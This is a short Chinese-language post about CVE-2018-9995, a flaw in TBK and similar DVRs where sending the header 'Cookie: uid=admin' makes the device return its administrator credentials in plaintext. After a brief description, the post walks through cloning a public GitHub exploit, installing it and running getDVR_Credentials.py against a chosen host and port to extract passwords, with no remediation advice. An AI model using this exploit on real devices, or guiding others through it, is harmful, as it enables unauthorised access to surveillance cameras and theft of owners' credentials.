漏洞編號:CVE-2018-9995
發現時間:2018-4
影響範圍:tbk、NovoCeNova、QSee、Pulnix、XVR 5 in 1、Securus、Night OWL
漏洞描述: DVR,全稱為Digital Video Recorder(硬盤錄像機),即數字視頻錄像機,相對於傳統的模擬攝像錄像機,採用硬盤錄像,故常常被稱為硬盤錄像機,也被稱為DVR。它是一套進行圖像計算存儲處理的計算機系統,具有對圖像/語音和動態幀等進行長時間錄像、錄音、遠程監視和控制的功能,DVR集合了錄像機、畫面分割器、雲臺鏡頭控制、報警控制、網絡傳輸等五種功能於一身,用一臺設備就能取代模擬監控系統一大堆設備的功能。 最初由阿根廷研究員發現,通過使用“Cookie: uid = admin”的Cookie標頭來訪問特定DVR的控制面板,DVR將以明文形式響應設備的管理員憑證。並且在GitHub發佈了相關驗證說明。
最開始研究員發現CVE-2018-9995僅影響由TBK製造的DVR設備,但接下來發現,由其他供應商的產品同樣受到影響,包括但不限於:Novo、cenova、qseepulnix、night owl。
現在github上下載相應的cve文檔 並進行安裝
https://github.com/ezelf/CVE-2018-9995_dvr_credentials
git clone https://github.com/ezelf/CVE-2018-9995_dvr_credentials.git
使用
cd CVE-2018-9995_dvr_credentials
pip install -r requirements.txt
python getDVR_Credentials.py --host HOST [--port PORT]
host 為目標地址 port 為目標端口號 如果目標端口號是其他端口就需要設置,如果是80端口則無需設置
爆出密碼,
視頻演示
